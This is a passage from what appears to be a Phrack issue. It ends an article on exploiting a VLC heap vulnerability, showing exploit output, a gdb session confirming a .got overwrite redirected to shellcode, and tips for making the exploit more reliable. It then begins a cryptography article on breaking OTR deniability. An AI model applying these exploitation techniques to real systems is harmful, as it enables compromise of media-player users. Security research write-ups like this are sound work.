0x28b322c0...0x28b32300...0x28b32340...0x28b32380...0x28b323c0...
|
|
0x28b32400...0x28b32440...0x28b32480...0x28b324c0...0x28b32500...
|
|
0x28b32540...0x28b32580...0x28b325c0...0x28b32600...0x28b32640...
|
|
0x28b32680...0x28b326c0...0x28b32700...0x28b32740...0x28b32780...
|
|
0x28b327c0...0x28b32800...0x28b32840...0x28b32880...0x28b328c0...
|
|
0x28b32900...0x28b32940...0x28b32980...0x28b329c0...0x28b32a00...
|
|
0x28b32a40...0x28b32a80...0x28b32ac0...0x28b32b00...0x28b32b40...
|
|
0x28b32b80...0x28b32bc0...0x28b32c00...0x28b32c40...0x28b32c80...
|
|
0x28b32cc0...0x28b32d00...0x28b32d40...0x28b32d80...0x28b32dc0...
|
|
0x28b32e00...0x28b32e40...0x28b32e80...0x28b32ec0...0x28b32f00...
|
|
0x28b32f40...0x28b32f80...0x28b32fc0...0x28b33080...0x28b330c0...
|
|
0x28b33100...0x28b33140...0x28b33180...0x28b331c0...0x28b33200...
|
|
0x28b33240...0x28b33280...0x28b332c0...0x28b33300...0x28b33340...
|
|
0x28b33380...0x28b333c0...0x28b33400...0x28b33440...0x28b33480...
|
|
0x28b334c0...0x28b33500...0x28b33540...0x28b33580...0x28b335c0...
|
|
0x28b33600...0x28b33640...0x28b33680...0x28b336c0...0x28b33700...
|
|
0x28b33740...0x28b33780...0x28b337c0...0x28b33800...0x28b33840...
|
|
0x28b33880...0x28b338c0...0x28b33900...0x28b33940...0x28b33980...
|
|
0x28b339c0...0x28b33a00...0x28b33a40...0x28b33a80...0x28b33ac0...
|
|
0x28b33b00...0x28b33b40...0x28b33b80...0x28b33bc0...0x28b33c00...
|
|
0x28b33c40...0x28b33c80...0x28b33cc0...0x28b33d00...0x28b33d40...
|
|
0x28b33d80...0x28b33dc0...0x28b33e00...0x28b33e40...0x28b33e80...
|
|
0x28b33ec0...0x28b33f00...0x28b33f40...0x28b33f80...0x28b33fc0...
|
|
0x28b34080...0x28b340c0...0x28b34100...0x28b34140...0x28b34180...
|
|
0x28b341c0...0x28b34200...0x28b34240...0x28b34280...0x28b342c0...
|
|
0x28b34300...0x28b34340...0x28b34380...0x28b343c0...0x28b34400...
|
|
0x28b34440...0x28b34480...0x28b344c0...0x28b34500...0x28b34540...
|
|
0x28b34580...0x28b345c0...0x28b34600...0x28b34640...0x28b34680...
|
|
0x28b346c0...0x28b34700...0x28b34740...0x28b34780...0x28b347c0...
|
|
0x28b34800...0x28b34840...0x28b34880...0x28b348c0...0x28b34900...
|
|
0x28b34940...0x28b34980...0x28b349c0...0x28b34a00...0x28b34a40...
|
|
0x28b34a80...0x28b34ac0...0x28b34b00...0x28b34b40...0x28b34b80...
|
|
0x28b34bc0...0x28b34c00...0x28b34c40...0x28b34c80...0x28b34cc0...
|
|
0x28b34d00...0x28b34d40...0x28b34d80...0x28b34dc0...0x28b34e00...
|
|
0x28b34e40...0x28b34e80...0x28b34ec0...0x28b34f00...0x28b34f40...
|
|
0x28b34f80...0x28b34fc0...0x28b36080...0x28b360c0...0x28b36100...
|
|
0x28b36140...0x28b36180...0x28b361c0...0x28b36200...0x28b36240...
|
|
0x28b36280...0x28b362c0...0x28b36300...0x28b36340...0x28b36380...
|
|
0x28b363c0...0x28b36400...0x28b36440...0x28b36480...0x28b364c0...
|
|
0x28b36500...0x28b36540...0x28b36580...0x28b365c0...0x28b36600...
|
|
0x28b36640...0x28b36680...0x28b366c0...0x28b36700...0x28b36740...
|
|
0x28b36780...0x28b367c0...0x28b36800...0x28b36840...0x28b36880...
|
|
0x28b368c0...0x28b36900...0x28b36940...0x28b36980...0x28b369c0...
|
|
0x28b36a00...0x28b36a40...0x28b36a80...0x28b36ac0...0x28b36b00...
|
|
0x28b36b40...0x28b36b80...0x28b36bc0...0x28b36c00...0x28b36c40...
|
|
0x28b36c80...0x28b36cc0...0x28b36d00...0x28b36d40...0x28b36d80...
|
|
0x28b36dc0...0x28b36e00...0x28b36e40...0x28b36e80...0x28b36ec0...
|
|
0x28b36f00...0x28b36f40...0x28b36f80...0x28b36fc0...0x28b37080...
|
|
0x28b370c0...0x28b37100...0x28b37140...0x28b37180...0x28b371c0...
|
|
0x28b37200...0x28b37240...0x28b37280...0x28b372c0...0x28b37300...
|
|
0x28b37340...0x28b37380...0x28b373c0...0x28b37400...0x28b37440...
|
|
0x28b37480...0x28b374c0...0x28b37500...0x28b37540...0x28b37580...
|
|
0x28b375c0...0x28b37600...0x28b37640...0x28b37680...0x28b376c0...
|
|
0x28b37700...0x28b37740...0x28b37780...0x28b377c0...0x28b37800...
|
|
0x28b37840...0x28b37880...0x28b378c0...0x28b37900...0x28b37940...
|
|
0x28b37980...0x28b379c0...0x28b37a00...0x28b37a40...0x28b37a80...
|
|
0x28b37ac0...0x28b37b00...0x28b37b40...0x28b37b80...0x28b37bc0...
|
|
0x28b37c00...0x28b37c40...0x28b37c80...0x28b37cc0...0x28b37d00...
|
|
0x28b37d40...0x28b37d80...0x28b37dc0...0x28b37e00...0x28b37e40...
|
|
0x28b37e80...0x28b37ec0...0x28b37f00...0x28b37f40...0x28b37f80...
|
|
0x28b37fc0...0x28b38080...0x28b380c0...0x28b38100...0x28b38140...
|
|
0x28b38180...0x28b381c0...0x28b38200...0x28b38240...0x28b38280...
|
|
0x28b382c0...0x28b38300...0x28b38340...0x28b38380...0x28b383c0...
|
|
0x28b38400...0x28b38440...0x28b38480...0x28b384c0...0x28b38500...
|
|
0x28b38540...0x28b38580...0x28b385c0...0x28b38600...0x28b38640...
|
|
0x28b38680...0x28b386c0...0x28b38700...0x28b38740...0x28b38780...
|
|
0x28b387c0...0x28b38800...0x28b38840...0x28b38880...0x28b388c0...
|
|
0x28b38900...0x28b38940...0x28b38980...0x28b389c0...0x28b38a00...
|
|
0x28b38a40...0x28b38a80...0x28b38ac0...0x28b38b00...0x28b38b40...
|
|
0x28b38b80...0x28b38bc0...0x28b38c00...0x28b38c40...0x28b38c80...
|
|
0x28b38cc0...0x28b38d00...0x28b38d40...0x28b38d80...0x28b38dc0...
|
|
0x28b38e00...0x28b38e40...0x28b38e80...0x28b38ec0...0x28b38f00...
|
|
0x28b38f40...0x28b38f80...0x28b38fc0...0x28b39080...0x28b390c0...
|
|
0x28b39100...0x28b39140...0x28b39180...0x28b391c0...0x28b39200...
|
|
0x28b39240...0x28b39280...0x28b392c0...0x28b39300...0x28b39340...
|
|
0x28b39380...0x28b393c0...0x28b39400...0x28b39440...0x28b39480...
|
|
0x28b394c0...0x28b39500...0x28b39540...0x28b39580...0x28b395c0...
|
|
0x28b39600...0x28b39640...0x28b39680...0x28b396c0...0x28b39700...
|
|
0x28b39740...0x28b39780...0x28b397c0...0x28b39800...0x28b39840...
|
|
0x28b39880...0x28b398c0...0x28b39900...0x28b39940...0x28b39980...
|
|
0x28b399c0...0x28b39a00...0x28b39a40...0x28b39a80...0x28b39ac0...
|
|
0x28b39b00...0x28b39b40...0x28b39b80...0x28b39bc0...0x28b39c00...
|
|
0x28b39c40...0x28b39c80...0x28b39cc0...0x28b39d00...0x28b39d40...
|
|
0x28b39d80...0x28b39dc0...0x28b39e00...0x28b39e40...0x28b39e80...
|
|
0x28b39ec0...0x28b39f00...0x28b39f40...0x28b39f80...0x28b39fc0...
|
|
0x28b3a080...0x28b3a0c0...0x28b3a100...0x28b3a140...0x28b3a180...
|
|
0x28b3a1c0...0x28b3a200...0x28b3a240...0x28b3a280...0x28b3a2c0...
|
|
0x28b3a300...0x28b3a340...0x28b3a380...0x28b3a3c0...0x28b3a400...
|
|
0x28b3a440...0x28b3a480...0x28b3a4c0...0x28b3a500...0x28b3a540...
|
|
0x28b3a580...0x28b3a5c0...0x28b3a600...0x28b3a640...0x28b3a680...
|
|
0x28b3a6c0...0x28b3a700...0x28b3a740...0x28b3a780...0x28b3a7c0...
|
|
0x28b3a800...0x28b3a840...0x28b3a880...0x28b3a8c0...0x28b3a900...
|
|
0x28b3a940...0x28b3a980...0x28b3a9c0...0x28b3aa00...0x28b3aa40...
|
|
0x28b3aa80...0x28b3aac0...0x28b3ab00...0x28b3ab40...0x28b3ab80...
|
|
0x28b3abc0...0x28b3ac00...0x28b3ac40...0x28b3ac80...0x28b3acc0...
|
|
0x28b3ad00...0x28b3ad40...0x28b3ad80...0x28b3adc0...0x28b3ae00...
|
|
0x28b3ae40...0x28b3ae80...0x28b3aec0...0x28b3af00...0x28b3af40...
|
|
0x28b3af80...0x28b3afc0...0x28b3b080...0x28b3b0c0...0x28b3b100...
|
|
0x28b3b140...0x28b3b180...0x28b3b1c0...0x28b3b200...0x28b3b240...
|
|
0x28b3b280...0x28b3b2c0...0x28b3b300...0x28b3b340...0x28b3b380...
|
|
0x28b3b3c0...0x28b3b400...0x28b3b440...0x28b3b480...0x28b3b4c0...
|
|
0x28b3b500...0x28b3b540...0x28b3b580...0x28b3b5c0...0x28b3b600...
|
|
0x28b3b640...0x28b3b680...0x28b3b6c0...0x28b3b700...0x28b3b740...
|
|
0x28b3b780...0x28b3b7c0...0x28b3b800...0x28b3b840...0x28b3b880...
|
|
0x28b3b8c0...0x28b3b900...0x28b3b940...0x28b3b980...0x28b3b9c0...
|
|
0x28b3ba00...0x28b3ba40...0x28b3ba80...0x28b3bac0...0x28b3bb00...
|
|
0x28b3bb40...0x28b3bb80...0x28b3bbc0...0x28b3bc00...0x28b3bc40...
|
|
0x28b3bc80...0x28b3bcc0...0x28b3bd00...0x28b3bd40...0x28b3bd80...
|
|
0x28b3bdc0...0x28b3be00...0x28b3be40...0x28b3be80...0x28b3bec0...
|
|
0x28b3bf00...0x28b3bf40...0x28b3bf80...0x28b3bfc0...0x28bac080...
|
|
0x28bac0c0...0x28bac100...0x28bac140...0x28bac180...0x28bac1c0...
|
|
0x28bac200...0x28bac240...0x28bac280...0x28bac2c0...0x28bac300...
|
|
0x28bac340...0x28bac380...0x28bac3c0...0x28bac400...0x28bac440...
|
|
0x28bac480...0x28bac4c0...0x28bac500...0x28bac540...0x28bac580...
|
|
0x28bac5c0...0x28bac600...0x28bac640...0x28bac680...0x28bac6c0...
|
|
0x28bac700...0x28bac740...0x28bac780...0x28bac7c0...0x28bac800...
|
|
0x28bac840...0x28bac880...0x28bac8c0...0x28bac900...0x28bac940...
|
|
0x28bac980...0x28bac9c0...0x28baca00...0x28baca40...0x28baca80...
|
|
0x28bacac0...0x28bacb00...0x28bacb40...0x28bacb80...0x28bacbc0...
|
|
0x28bacc00...0x28bacc40...0x28bacc80...0x28baccc0...0x28bacd00...
|
|
0x28bacd40...0x28bacd80...0x28bacdc0...0x28bace00...0x28bace40...
|
|
0x28bace80...0x28bacec0...0x28bacf00...0x28bacf40...0x28bacf80...
|
|
0x28bacfc0...0x28bad080...0x28bad0c0...0x28bad100...0x28bad140...
|
|
0x28bad180...0x28bad1c0...0x28bad200...0x28bad240...0x28bad280...
|
|
0x28bad2c0...0x28bad300...0x28bad340...0x28bad380...0x28bad3c0...
|
|
0x28bad400...0x28bad440...0x28bad480...0x28bad4c0...0x28bad500...
|
|
0x28bad540...0x28bad580...0x28bad5c0...0x28bad600...0x28bad640...
|
|
0x28bad680...0x28bad6c0...0x28bad700...0x28bad740...0x28bad780...
|
|
0x28bad7c0...0x28bad800...0x28bad840...0x28bad880...0x28bad8c0...
|
|
0x28bad900...0x28bad940...0x28bad980...0x28bad9c0...0x28bada00...
|
|
0x28bada40...0x28bada80...0x28badac0...0x28badb00...0x28badb40...
|
|
0x28badb80...0x28badbc0...0x28badc00...0x28badc40...0x28badc80...
|
|
0x28badcc0...0x28badd00...0x28badd40...0x28badd80...0x28baddc0...
|
|
0x28bade00...0x28bade40...0x28bade80...0x28badec0...0x28badf00...
|
|
0x28badf40...0x28badf80...0x28badfc0...0x28bae080...0x28bae0c0...
|
|
0x28bae100...0x28bae140...0x28bae180...0x28bae1c0...0x28bae200...
|
|
0x28bae240...0x28bae280...0x28bae2c0...0x28bae300...0x28bae340...
|
|
0x28bae380...0x28bae3c0...0x28bae400...0x28bae440...0x28bae480...
|
|
0x28bae4c0...0x28bae500...0x28bae540...0x28bae580...0x28bae5c0...
|
|
0x28bae600...0x28bae640...0x28bae680...0x28bae6c0...0x28bae700...
|
|
0x28bae740...0x28bae780...0x28bae7c0...0x28bae800...0x28bae840...
|
|
0x28bae880...0x28bae8c0...0x28bae900...0x28bae940...0x28bae980...
|
|
0x28bae9c0...0x28baea00...0x28baea40...0x28baea80...0x28baeac0...
|
|
0x28baeb00...0x28baeb40...0x28baeb80...0x28baebc0...0x28baec00...
|
|
0x28baec40...0x28baec80...0x28baecc0...0x28baed00...0x28baed40...
|
|
0x28baed80...0x28baedc0...0x28baee00...0x28baee40...0x28baee80...
|
|
0x28baeec0...0x28baef00...0x28baef40...0x28baef80...0x28baefc0...
|
|
0x28baf080...0x28baf0c0...0x28baf100...0x28baf140...0x28baf180...
|
|
0x28baf1c0...0x28baf200...0x28baf240...0x28baf280...0x28baf2c0...
|
|
0x28baf300...0x28baf340...0x28baf380...0x28baf3c0...0x28baf400...
|
|
0x28baf440...0x28baf480...0x28baf4c0...0x28baf500...0x28baf540...
|
|
0x28baf580...0x28baf5c0...0x28baf600...0x28baf640...0x28baf680...
|
|
0x28baf6c0...0x28baf700...0x28baf740...0x28baf780...0x28baf7c0...
|
|
0x28baf800...0x28baf840...0x28baf880...0x28baf8c0...0x28baf900...
|
|
0x28baf940...0x28baf980...0x28baf9c0...0x28bafa00...0x28bafa40...
|
|
0x28bafa80...0x28bafac0...0x28bafb00...0x28bafb40...0x28bafb80...
|
|
0x28bafbc0...0x28bafc00...0x28bafc40...0x28bafc80...0x28bafcc0...
|
|
0x28bafd00...0x28bafd40...0x28bafd80...0x28bafdc0...0x28bafe00...
|
|
0x28bafe40...0x28bafe80...0x28bafec0...0x28baff00...0x28baff40...
|
|
0x28baff80...0x28baffc0...ok
|
|
[~] Forcing shellcode execution
|
|
[~] Playing MP4 file 1 times
|
|
.ok
|
|
[~] Done
|
|
|
|
|
|
The console on the other side looks like the following:
|
|
|
|
|
|
Program received signal SIGTRAP, Trace/breakpoint trap.
|
|
0x28919b01 in ?? ()
|
|
|
|
|
|
The exploit output informs us that the .got entry for memset() lies
|
|
at 0x284edea8. Let's verify...
|
|
|
|
|
|
(gdb) x/4bx 0x284edea8
|
|
0x284edea8: 0x00 0x9b 0x91 0x28
|
|
(gdb) x/i 0x28919b00
|
|
0x28919b00: int3
|
|
|
|
|
|
Obviously, it has been overwritten with the pointer to our ASM
|
|
instructions. The 'SIGTRAP' informs us that EIP landed on top of them.
|
|
|
|
|
|
(gdb) quit
|
|
A debugging session is active.
|
|
|
|
Inferior 1 [process 2078] will be killed.
|
|
|
|
Quit anyway? (y or n) y
|
|
|
|
|
|
If you decide no to use gdb (that's what real men do), the following
|
|
message will pop up upon successful exploitation.
|
|
|
|
|
|
Trace/BPT trap: 5 (core dumped)
|
|
|
|
|
|
--[ 7 - Limitations
|
|
|
|
As we promised, we will give a list of the factors that limit our
|
|
exploit's reliability. People interested in improving our code should
|
|
first have a look below.
|
|
|
|
1 - Back in the section we analyzed the RMF vulnerability, we said that
|
|
the memory range we want leaked, is trashed with 'i_frame_size' bytes;
|
|
in our exploit code we use a frame size of 20, so, 20 bytes end up being
|
|
written at the target address. Apparently, because of this trashing of the
|
|
target memory, we cannot leak .text or any other read only mapping from
|
|
the target application, since attempting to write on it will terminate
|
|
VLC with a segmentation violation. Quick tests show that we cannot somehow
|
|
set 'i_frame_size' to 0 so that 'memcpy()' becomes a nop. Nevertheless,
|
|
the interested reader is advised to analyze this further and find a way
|
|
to bypass this limitation.
|
|
|
|
Note: Recall the RMF vulnerability; a function pointer overwrite is
|
|
possible. Managing to leak .text addresses means you can do automated
|
|
remote ROP gadget harvesting in order to write a reliable exploit ;)
|
|
|
|
2 - For some reason we are not aware of, requesting a memory leak of
|
|
more than 8MB returns no data at all. Maybe this is related to the output
|
|
filters splitting the 'p_blocks' in smaller parts, or maybe not ;p This
|
|
is a very important limitation, since smaller leaked data chunks means
|
|
more requests for leaked memory which in turn implies more memory being
|
|
trashed. Consequently, more data we shouldn't touch may be modified
|
|
resulting in an unexpected crash of VLC.
|
|
|
|
3 - Unfortunately, there's at least one logical bug within VLC;
|
|
a logical bug related to input buffering and the clients receiving
|
|
network streams. When we have some free time we may report it to the VLC
|
|
developers :p More logical bugs that confine the exploitation process'
|
|
reliability may be present. A reliable one shot exploit requires a
|
|
harder study of VLC's source code (yeah, as if we have nothing better
|
|
to deal with).
|
|
|
|
4 - The exploit assumes that 64-byte regions usually lie between 0x28700000
|
|
and 0x28e00000 and tries to locate them. Some times the heap extends
|
|
beyond that range. We have to find a way to figure this out, get the
|
|
topmost heap address and explore the whole region. Doing that in a
|
|
reliable way requires problem 2 to be solved first.
|
|
|
|
5 - In section 5.2 we analyzed how the 'p_root' candidates are located. The
|
|
process described in the aforementioned section takes into account only the
|
|
bins of the first arena, but VLC, being a multithreaded application,
|
|
initializes more than one. We believe it's possible to detect those extra
|
|
arenas, locate their bin-64 addresses and take them into account as well.
|
|
Alternatively, one may leak and analyze the TLS data of each thread thus
|
|
locating their magazine racks, their magazines and the 'rounds[]' array
|
|
corresponding to 64-byte regions.
|
|
|
|
6 - In step 6 of section 5.2 we said that all regions of the detected runs
|
|
will eventually be freed by our special MP4 file in hope that 'p_root' will
|
|
lie somewhere within them. Although we do our best to fill heap holes, this
|
|
process may result in a segmentation fault due to the fact that regions
|
|
already freed are freed for a second time. It is possible to avoid this by
|
|
having a look at the target runs' region bitmap and freeing only those
|
|
regions that seem to be allocated. We didn't have the time to implement
|
|
this but we believe it's trivial (take a look at the comments in the
|
|
exploit's 'main.py').
|
|
|
|
If you manage to solve any of these problems, please let us know; don't
|
|
be a greedy pussy ;)
|
|
|
|
|
|
--[ 8 - Final words
|
|
|
|
Exploit development is definitely a hard task; Do you think that the money
|
|
offered by [censored] is worth the trouble?
|
|
|
|
In this article, which is short compared to our efforts during the exploit
|
|
development, we tried to give as much detail as possible. Unfortunately
|
|
there's no way for us to present every minor detail; a deeper look into
|
|
VLC's source code is required. All that jemalloc stuff was fun but
|
|
tiresome. We think it's about time we take some time off :) We would like
|
|
to thank the Phrack staff for being the Phrack staff, our grhack.net
|
|
colleagues and all our friends that still keep it real. Our work is
|
|
dedicated to all those 'producers' of the security ecosystem that keep
|
|
their mouth shut and put their brains to work. Love, peace and lots of #.
|
|
|
|
|
|
--[ 9 - References
|
|
|
|
[1] vl4d1m1r of ac1db1tch3z, The art of exploitation: Autopsy of cvsxpl
|
|
http://www.phrack.org/issues.html?issue=64&id=15&mode=txt
|
|
|
|
[2] Feline Menace, Technical analysis of Samba WINS stack overflow
|
|
http://www.phrack.org/issues.html?issue=65&id=12&mode=txt
|
|
|
|
[3] GOBBLES, Local/remote mpg123 exploit
|
|
http://www.securityfocus.com/archive/1/306476
|
|
|
|
[4] VLC Security Advisory 1103
|
|
http://www.videolan.org/security/sa1103.html
|
|
|
|
[5] Chapter 4. Examples for advanced use of VLC's stream output
|
|
(transcoding, multiple streaming, etc...)
|
|
http://www.videolan.org/doc/streaming-howto/en/ch04.html
|
|
|
|
[6] VLC Security Advisory 1105
|
|
http://www.videolan.org/security/sa1105.html
|
|
|
|
[7] RealAudio
|
|
http://en.wikipedia.org/wiki/RealAudio
|
|
|
|
[8] RealAudio sipr
|
|
http://wiki.multimedia.cx/index.php?title=RealAudio_sipr
|
|
|
|
|
|
--[ 10 - T3h l337 c0d3z
|
|
|
|
|
|
--[ EOF
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume 0x0e, Issue 0x44, Phile #0x0e of 0x13
|
|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=-----------=[ Secure Function Evaluation vs. Deniability ]=------------=|
|
|
|=------------------=[ in OTR and similar protocols ]=-------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=-----------------------=[ greg <greg@so36.net> ]=----------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|
|
--[ Contents
|
|
|
|
1 - Introduction
|
|
1.1 - Prelude
|
|
|
|
2 - Preliminaries
|
|
2.1 - Diffie-Hellman
|
|
2.2 - RSA
|
|
2.3 - Oblivious Transfer
|
|
2.4 - Secure Function Evaluation
|
|
|
|
3 - OTR
|
|
|
|
4 - The Attack
|
|
4.1 - Sharing Diffie-Hellman Keys
|
|
4.2 - Generating MAC and Encryption Keys
|
|
4.3 - Sending and Receiving Messages
|
|
4.4 - The Final Protocol
|
|
4.5 - What's Left
|
|
|
|
5 - References
|
|
|
|
6 - Greetingz
|
|
|
|
--[ 1 - Introduction
|
|
|
|
Recent cryptographic primitives and protocols offer a wide range of
|
|
features besides confidentiality and integrity. There are many protocols
|
|
that have more advanced properties, such as forward secrecy, deniability or
|
|
anonymity. In this article, we're going to have a deeper look at
|
|
deniability in communication (e.g. messaging) protocols. One protocol that
|
|
claims to offer deniability is OTR. Although our construction can probably
|
|
be extended in a quite general way, we'll stick with OTR as an example
|
|
protocol. Our goal is to show the limits of deniability, especially in
|
|
protocols that offer message integrity features (as OTR does). We will do
|
|
this by constructing a protocol that enables each partner in a conversation
|
|
to cooperate with an observing party, such that he can prove the
|
|
authenticity of any message that was part of the conversation to the
|
|
observing party.
|
|
|
|
------[ 1.1 - Prelude
|
|
|
|
It was one of these days sitting together with bruhns and discussing stuff
|
|
(TM). Out of the sudden, he came up with the question: "You know, I'm
|
|
asking myself what a trusted timestamping service could be good for...?". I
|
|
told him "timestamps, most probably". He was like "Uhm, yes. And wouldn't
|
|
that affect the deniability of OTR somehow?". We discussed the matter for
|
|
quite a while and we finally agreed that a trusted timestamping service
|
|
itself wouldn't be enough to destroy the deniability of OTR. But our
|
|
interest remained...
|
|
|
|
--[ 2 - Preliminaries
|
|
|
|
In this section, we're going to give a quick overview of cryptographic
|
|
primitives we're gonna use. If you're already familiar with those, you can
|
|
happily skip our explanations and get to the real meat. The explanations
|
|
in this section will not contain all the mathematical background (i.e.
|
|
proofs ;) ), which is necessary to really *understand* what's going on.
|
|
We'd rather like to provide a high-level overview of how all the individual
|
|
components and how they can be combined.
|
|
|
|
------[ 2.1 - Symmetric Operations
|
|
|
|
We'll keep this real short; you probably know the most common symmetric
|
|
crypto algorithms. We will be using symmetric block ciphers (such as AES)
|
|
and hash functions (SHA for instance). Also, we will need MAC functions in
|
|
the following sections. You might already know HMAC, which is a MAC scheme
|
|
based on hash functions. MACs (Message Authentication Codes) are used to
|
|
protect the integrity of messages. Being a symmetric primitive, creating
|
|
and verifying the MAC requires knowledge of the same key. If someone can
|
|
verify a MAC, they can also create one.
|
|
|
|
------[ 2.1 - Diffie-Hellman
|
|
|
|
The Diffie-Hellman scheme is one of the most widely used key establishment
|
|
protocols today. The basic idea is the following: Alice and Bob want to
|
|
securely establish a key over an insecure channel. Diffie-Hellman enables
|
|
them to do this. During such a key-exchange both parties publicly send some
|
|
values and after the communication is finished, both can compute a common
|
|
key, which can *not* be computed by anyone who wiretaps the communication.
|
|
|
|
--------[ 2.1.1 The Math behind it
|
|
|
|
Alice and Bob agree on a prime p and some "generator" g. We won't discuss
|
|
too many details of the mathematical background here (if you're interested
|
|
in math, refer to [1]), so it's sufficient to say that in practice, g will
|
|
often have the value 2 and the prime p will be large. In many cases, p and
|
|
g are fixed parameters, on which both parties rely. Before describing the
|
|
actual protocol, we want to show one interesting observation: Given some
|
|
number x, it's trivial to compute values y = g^x mod p ("square and
|
|
multiply" are the magic words). Given the value y however, it's not trivial
|
|
at all to compute the value of x ("discrete logarithm problem", if you're
|
|
interested). This property can be used to build a key-establishment scheme
|
|
like this:
|
|
|
|
A --------------- a = g^x mod p --------------> B
|
|
A <-------------- b = g^y mod p --------------- B
|
|
|
|
A picks a random x, computes a = g^x mod p and sends that value over to B.
|
|
B picks a random y, computes b = g^y mod p and sends that value over to A.
|
|
The values a and b are also referred to as Diffie-Hellman public keys.
|
|
A now performs the following computation:
|
|
|
|
(2.1.1) ka = b^x mod p
|
|
|
|
B does the same and computes
|
|
|
|
(2.1.2) kb = a^y mod p
|
|
|
|
We can observe that due to the equation
|
|
|
|
(2.1.3) ka = b^x mod p = (g^y)^x = g^(yx) = g^(xy) = (g^x)^y = a^y = kb
|
|
|
|
ka and kb are equal. So A and B have established a common key k
|
|
(k = ka = kb). As an attacker however neither knows x nor y, he cannot
|
|
perform the same computation. The attacker could try to obtain x from a,
|
|
but as we outlined above, this is (hopefully) computationally infeasible
|
|
for large primes p and good generators g. In case of an active attacker,
|
|
this scheme can be broken by a simple man-in-the-middle attack, where the
|
|
attacker replaces Alice's and Bob's values by his own ones and then proxies
|
|
the traffic between both parties. This problem can be fixed by making use
|
|
of an authentication scheme: Alice and Bob need to "sign" the values that
|
|
they transfer, so that the attacker cannot modify them without destroying
|
|
the signature. There are many signature schemes out there (for instance
|
|
based on RSA, which is described below) and all of them come with
|
|
additional costs (you need to exchange public keys beforehand etc.). We
|
|
assume you know about all the higher-level problems, such as key
|
|
distribution, revocations, trust-models, etc. The basic principle of
|
|
Diffie-Hellman however stays the same - and that is what we're going to
|
|
focus on later in this article.
|
|
|
|
------[ 2.2 - RSA
|
|
|
|
Another gem of modern cryptography is the RSA crypto system. RSA is also
|
|
based on modular arithmetic, but it works in a different way than
|
|
Diffie-Hellman. Alice wants Bob to send her an encrypted message. However,
|
|
Alice and Bob have not exchanged any key material (if they had, Bob could
|
|
just make use of any block-cipher like AES to send encrypted data to
|
|
Alice). With RSA, Alice can send Bob a thing called her "public key". This
|
|
public key can be used by Bob to encrypt messages. However, nobody can
|
|
decrypt messages encrypted with Alice's public key without knowing another
|
|
piece of information called Alice's "secret key". As the name suggests,
|
|
Alice keeps her secret key secret. Therefore everybody can encrypt messages
|
|
for Alice, but nobody besides Alice can decrypt these messages.
|
|
|
|
--------[ 2.2.1 More Math
|
|
|
|
Alice wants to receive messages from Bob, so she first needs to generate an
|
|
RSA key-pair. Alice does the following: She picks two primes p and q and
|
|
computes
|
|
|
|
(2.2.1) N = p * q
|
|
|
|
She picks a value e (in practice, e = 65537 is a common choice) and
|
|
computes
|
|
|
|
(2.2.2) d = e^-1 mod (p-1)(q-1) (i.e. e*d = 1 mod (p-1)(q-1))
|
|
|
|
This computation can be performed efficiently using the extended euclidean
|
|
algorithm (but again, we won't dive into all the mathematical details too
|
|
much). Alice keeps all the values besides N and e secret.
|
|
|
|
A ---------------- N = p * q, e --------------> B
|
|
A <--------------- c = m^e mod N --------------- B
|
|
|
|
Alice now sends over N and e to Bob. Bob uses N and e to encrypt his
|
|
message m as follows:
|
|
|
|
(2.2.3) c = m^e mod N
|
|
|
|
Then, Bob sends the ciphertext c over to Alice. Alice can use d to decrypt
|
|
the ciphertext:
|
|
|
|
(2.2.4) m = c^d mod N
|
|
|
|
This works due to the way e and d are chosen in equation (2.2.2).
|
|
To decrypt the ciphertext, an attacker could of course try to compute d.
|
|
But computing d is hard without knowing p and q. And obtaining p and q from
|
|
N is assumed to be an infeasible problem for large values of N.
|
|
|
|
The tuple (N, e) is commonly called an RSA public key, whereas (N, d) is
|
|
called private key. We can view an RSA instance (with fixed keys) as a set
|
|
of two functions, f and f^-1, where f is the function that encrypts data
|
|
using the public key and f^-1 is the function that decrypts data using the
|
|
private key. We'll call such functions one-way functions.
|
|
|
|
Instead of encrypting data with the receiver's public key, we can also use
|
|
RSA as a signature scheme. The signer of a message first uses a hash
|
|
function on his message. He then encrypts the hash value with his private
|
|
key. This signature can be verified using the signer's public key: the
|
|
verifier uses the public key to decrypt the hash value, computes the hash
|
|
of the message he received and then compares the hashes. An attacker will
|
|
not be able to produce such a signature, because he doesn't know the
|
|
signer's private key.
|
|
|
|
Please be aware that (like all the other algorithms described in this
|
|
document), RSA should in practice not be used as described above. In
|
|
particular, we did not describe how to correctly convert messages into
|
|
numbers (RSA operates on natural numbers, remember?) and how to securely
|
|
pad plaintexts. Depending on the respective security goals, there are a
|
|
number of possible padding schemes (such as OAEP+), but we're not going to
|
|
describe them here in detail.
|
|
|
|
------[ 2.3 - Oblivious Transfer
|
|
|
|
Oblivious transfer is a real funny primitive. Suppose, Bob knows two values
|
|
x0 and x1. Alice wants to obtain one of those values, but she doesn't want
|
|
to tell Bob which value she wants. Now Bob could of course tell Alice both
|
|
values (that way he wouldn't know, which one Alice was interested in).
|
|
However, Bob wants to make some money and so he takes $1k per value. Poor
|
|
Alice however only has $1k, so she can't afford to buy both values from
|
|
Bob. This problem can be solved with an oblivious transfer. An oblivious
|
|
transfer is a cryptographic protocol, so it requires a number of messages
|
|
to be exchanged between Alice and Bob. After the messages are exchanged,
|
|
Alice will receive the value she wanted and Bob won't know which value that
|
|
was.
|
|
|
|
--------[ 2.3.1 Math Voodoo
|
|
|
|
There are a number of protocols for performing an oblivious transfer, based
|
|
on different cryptographic assumptions. We are going to describe one
|
|
classical example here, which can be implemented using a public-key
|
|
cryptosystem (such as RSA). More details of this construction can be found
|
|
in [7].
|
|
|
|
The system works like this: Bob picks one-way functions f, f^-1 and sends f
|
|
over to Alice. Along with f, he sends two random values r0 and r1. You can
|
|
think of f and f^-1 as RSA functions using fixed keys (as described above).
|
|
|
|
A <---------------- f, r0, r1 -------------- B
|
|
A ------------- z = f(k) XOR rb -----------> B
|
|
|
|
Alice wants to receive value xb (b = 0 or 1) from Bob. She picks a random
|
|
k, computes f(k) and XORs it with r0 if she wants to receive x0 or with r1
|
|
if she wants to receive x1. The XOR operation is sometimes also called
|
|
"blinding". Depending on the cryptosystem that is used to obtain f and
|
|
f^-1, there might be more appropriate choices then just using XOR. For RSA,
|
|
it would be natural to use integer addition and subtraction (modulo N)
|
|
instead of the XOR operation.
|
|
|
|
